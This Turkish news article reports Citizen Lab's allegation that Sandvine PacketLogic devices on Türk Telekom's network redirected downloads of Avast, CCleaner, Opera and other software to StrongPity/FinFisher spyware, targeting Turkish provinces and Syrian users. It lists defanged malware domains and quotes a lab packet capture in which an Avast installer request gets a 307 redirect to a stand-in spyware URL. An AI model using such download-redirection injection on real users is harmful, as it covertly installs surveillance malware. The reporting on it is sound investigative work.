”Türk Telekom bilgisayarlara casus yazılım yükledi!”

Kanada’da Toronto Üniversitesi bünyesinde faaliyet yürüten Citizen Lab tarafından yayınlanan makalede Türkiye’de derin veri analizi (DPI) cihazlarıyla zararlı yazılımların yayıldığı iddia edildi.

İddiaya göre Türk Telekom ağında Opera, VLC Player, CCleaner, WinRar, 7-Zip, Avast Antivirüs ve Driver Booster indirmek isteyen kullanıcıların bağlantıları zararlı yazılımlara yönlendirildi. Hedeflenmiş bölgelerde bu yazılımları indiren kullanıcıların bilgisayarlarına malware bulaştırıldığı belirtiliyor.

Casus yazılım enjeksiyonu 

Türk Telekom ağında ‘middlebox’lar bulunması üzerine konuya yoğunlaşan araştırmacılar, yazılım üreticilerinin internet sitelerindeki açıklar kullanılarak, kullanıcıların casus yazılımlara yönlendirildiğini iddia etti.

StrongPity ve FinFisher kullanılarak gerçekleştirilen işlem, HTTPS açıkları olan internet sitelerinde uygulanabiliyor. Şifrelenmiş bağlantılar sağlayan HTTPS teknolojisinde bağlantının değiştirilmesi veya okunabilmesi mümkün değil. Ancak, HTTP teknolojisinde şifresiz olarak sağlanan bağlantı okunabiliyor ve yönlendirme sağlanabiliyor.

Yayınlanan makalede ”Avast Antivirus, CCleaner, Opera, ve 7-Zip gibi resmi sağlayıcılardan Windows uygulamaları indiren Türkiye ve Suriye’deki kullanıcıların, HTTP yönlendirmesi enjeksiyonu marifetiyle sessizce casus yazılıma yöneltildiklerini tespit ettik. Bu programların resmî web siteleri HTTPS bağlantıyı desteklemelerine rağmen, kullanıcıyı yönlendirdikleri indirme bağlantısı HTTPS olmadığından casus yazılıma yöneltme mümkün olabiliyor. Bunun yanı sıra, yine Türkiye ve Suriye’den kullanıcılar CBS Interactive’in Download.com sitesinden (CNET tarafından sağlanan bir yazılım indirme platformu) çeşitli uygulamalar indirdiklerinde casus yazılım içeren versiyonlarını alıyorlar. Download.com, “güvenli indirme” bağlantıları sağlıyormuş gibi görünse de HTTPS desteklemiyor.” ifadeleri kullanıldı.

”Hedeflenmiş bölgelere malware yayılıyor”

İddiaya göre Türkiye’de derin veri analizi cihazları ile belli bölgelere malware yayılıyor. Özellikle Suriye sınırı yakınlarındaki illerin hedeflendiğini söyleyen araştırmacılar, atakların uygulamaların Windows sürümleri temel alınarak yapıldığını belirtti.

Şubat 2018 itibariyle Türkiye’de 5 ilde ‘malware injection‘ işlemi yapan sunucu bulunduğunu iddia eden araştırmacılar, bu illerin Ankara, Adana, Gaziantep, Diyarkabır ve Hatay olduğunu açıkladı. İndirme bağlantılarındaki DNS(PTR) kayıtları sayesinde sunucuların konumlarının tespit edildiğini söyleyen araştırmacılar, bu işlem için 259 IP adresinin kullanıldığını tespit etti.

Malware alan adı (Şubat 2018) Malware alan adı (Mart 2018) Sunucu lokasyonları solitude.file-download[.]today system.filedownloaders[.]com Hatay system.documentations[.]live epoch.englishdownloaders[.]today Gaziantep epiphany.download-document[.]world epiphany.download-document[.]world Ankara (Ulus) epoch.wind-files[.]today document.downloadingsystem[.]com Adana internet.document-management[.]today internet.downloadingdocuments[.]com Diyarbakir

”Sandvine PacketLogic cihazları kullanılarak yapılıyor”

Makaledeki belirtilenlere göre Türkiye ve Mısır internet erişimini Sandvine firmasının ürettiği PacketLogic ile kontrol ediyor. Bu cihazların internet erişimini kaydetme, engelleme ve yönlendirme yetisine sahip olduğu, bu sayede ülkelerdeki internet erişiminin kaydedilip bazı internet sitelerinin engellendiği söyleniyor. Bulunan ‘middlebox’ları test eden araştırmacılar, sonuçtan emin olmak için ikinci el PacketLogic PL7720 edindi.

2009’da yayınlanmış 12.1 firmware sürümünü kullanan cihaz üzerinde trafik değiştirme ve casus yazılımlar ile ilgili detaylı testler yapıldı. İddiaya göre yapılan testlerde elde edilen ‘kod izleri’ Türkiye ve Mısır’ın internet ağında bulunanlar ile neredeyse aynı.

İddia edilen spyware verisi

Citizen Lab tarafından yapılan iddiada kullanıcıların indirmek istedikleri yazılımlara casus yazılımların gömüldüğü ve o şekilde indirmeleri sağlandığı söyleniyordu. Avast üzerinden iddialarını örneklendiren yazarlar, avast_free_antivirus_setup_online.exe dosyasının indirilmek istendiğinde önceden belirlenmiş Filtering Rule ‘un bağlantıyı başka bir bağlantıya yönlendirdiğini belirtiyor.

Avast kurulum dosyası giden istek

17:28:25.024018 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 170)
192.168.1.27.49458 > 192.168.1.26.8080: Flags [P.], seq 1:119, ack 1, win 4117, options [nop,nop,TS val 756363711 ecr 2094486068], length 118: HTTP, length: 118
GET /avast_free_antivirus_setup_online.exe HTTP/1.1
Host: 192.168.1.26:8080
User-Agent: curl/7.54.0
Accept: */*

Avast kurulum dosyası olarak gelen veri (spyware eklenmiş)

17:28:25.024300 IP (tos 0x0, ttl 64, id 13330, offset 0, flags [none], proto TCP (6), length 134)
192.168.1.26.8080 > 192.168.1.27.49458: Flags [F.], seq 1:95, ack 119, win 32120, length 94: HTTP, length: 94
HTTP/1.1 307 Temporary Redirect
Location: http://example.com/spyware.exe
Connection: close

Suriye de hedefte

Casus yazılım enjeksiyonunun sadece Türkiye’de kullanılmadığını söyleyen araştırmacılar,  ”Türkiye alanında yaptığımız taramalar, bu casus yazılım enjeksiyonunun en az beş şehirde kullanıldığını gösteriyor. Türkiye’deki hedeflere ek olarak, Türk Telekom abonelerinin sınırın diğer tarafına yansıttığı wi-fi bağlantıları üzerinden, bazen düzinelercesi tek IP adresini paylaşarak internet kullanan Suriyeli kullanıcılar da hedef olmuş durumda. İncelediğimiz bir vakada, Türkiye menşeili tek bir IP adresini yüzlerce Suriyeli kullanıcı paylaşmaktaydı. Wi-Fi yönlendirici sayfalarında herkese açık olan verilere dayanarak, hedef alınmış olan en az iki IP adresinin YPG’li (Kürt milisler) kullanıcılara hizmet ettiğini belirledik. YPG, Türkiye hükümetinin 2018 Ocak’ta başlattığı hava ve kara operasyonlarının hedefinde. YPG kontrolünde olmayan İdlib gibi bölgeler de hedefte” dedi.

VPN engellemek isteyen ülkelere hizmet veriyor

Sandvine şirketinin Türkiye ve Mısır operasyonları da araştırldı. LinkedIn üzerinde Istanbul’da bir ‘çözüm mühendisi’ profili bulunduğu, Mısır’da ise ‘kıdemli saha mühendisi’ profili bulunduğu iddia edildi. Makalede çalışanlarla ilgili ”Sandvine’a ait “Kariyerler” sayfasında “Saha Operasyon Mühendisi” pozisyonunun sorumlulukları tanımlanırken, “operasyon ile ilgili görevleri yerine getirmek, müşterinin bulunduğu yerde ikamet etmek,” ve “müşterinin operasyon ve iş geliştirme ekipleriyle yakın çalışmak” gibi ifadeler kullanılmış. 2016 tarihli bir Procera “kullanım vakaları” broşürünün “Mevzuata Uygunluk – Trafik Engelleme” bölümünde, VPN ya da VoIP gibi hizmetleri engellemek isteyen Procera müşterilerine “sahada mühendislik hizmetleri” temin edildiği belirtiliyor.” ifadesi de yer alıyor.

Türkiye’den henüz açıklama gelmedi

Henüz sadece ciddi bir iddia konumunda olan makale hakkında resmi bir açıklama henüz gelmedi. Türk Telekom için ağır iddialarda bulunan makale, önümüzdeki günlerde çok konuşulacak gibi duruyor.

::İddiaların gerçekliği hakkında ne düşünüyorsunuz? Düşüncelerinizi bizimle paylaşmayı unutmayın.